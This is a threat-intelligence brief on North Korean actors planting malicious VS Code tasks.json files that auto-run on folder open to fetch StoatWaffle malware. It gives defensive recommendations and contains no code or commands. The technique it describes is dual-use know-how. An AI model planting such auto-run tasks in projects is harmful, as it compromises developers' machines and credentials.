HomeIntelligenceBrief
🔓 BREACH BRIEF🟠 High🔍 ThreatIntel

North Korean Hackers Exploit VS Code Auto‑Run Tasks to Deploy StoatWaffle Malware

North Korean threat actors have begun embedding malicious tasks.json files in VS Code projects, causing the editor to auto‑run commands that download the StoatWaffle malware family. The technique expands the attack surface of development environments and poses a high‑risk supply‑chain threat for any organization that permits VS Code usage.

🛡️ LiveThreat™ Intelligence · 📅 March 24, 2026· 📰 thehackernews.com
🟠
Severity
High
🔍
Type
ThreatIntel
🎯
Confidence
High
🏢
Affected
4 sector(s)
Actions
4 recommended
📰
Source
thehackernews.com

North Korean Hackers Exploit VS Code Auto‑Run Tasks to Deploy StoatWaffle Malware, Threatening Development Environments

What Happened — North Korean threat actors (attributed to the “Contagious Interview”/WaterPlum campaign) have begun embedding malicious tasks.json files in Microsoft Visual Studio Code projects. When a developer opens the project, VS Code automatically executes the task, silently downloading and installing the StoatWaffle malware family. The technique has been observed in the wild since December 2025 and represents a novel supply‑chain abuse of a widely‑used development tool.

Why It Matters for TPRM

  • Development tools are often trusted “zero‑trust” entry points; a compromise can give attackers footholds inside otherwise hardened networks.
  • Third‑party code repositories and shared VS Code settings become attack vectors, expanding the attack surface beyond traditional endpoints.
  • The stealthy nature of the auto‑run task makes detection difficult, increasing the risk of credential theft, data exfiltration, and lateral movement.

Who Is Affected — Technology/SaaS vendors, financial services firms, healthcare IT departments, and any organization that allows developers to use VS Code or shared project templates.

Recommended Actions

  • Enforce code‑signing and integrity checks for all VS Code extensions and workspace files.
  • Disable automatic task execution in VS Code or require manual approval for tasks.json scripts.
  • Deploy endpoint detection and response (EDR) rules that flag creation or execution of suspicious tasks.json files.
  • Conduct a review of third‑party code repositories for malicious payloads and educate developers on supply‑chain hygiene.

Technical Notes — The abuse leverages VS Code’s built‑in task runner (defined in tasks.json) to execute PowerShell or Node.js commands that download the StoatWaffle payload. No specific CVE is cited; the vector is a mis‑use of a legitimate feature. The malware is capable of credential dumping, keylogging, and establishing persistence via scheduled tasks. Source: The Hacker News

📰 Original Source
https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.

🛡️

Monitor Your Vendor Risk with LiveThreat™

Get automated breach alerts, security scorecards, and intelligence briefs when your vendors are compromised.

Start Free Trial → Learn About Scorecards
← All Intelligence Briefs Breach Watch Feed →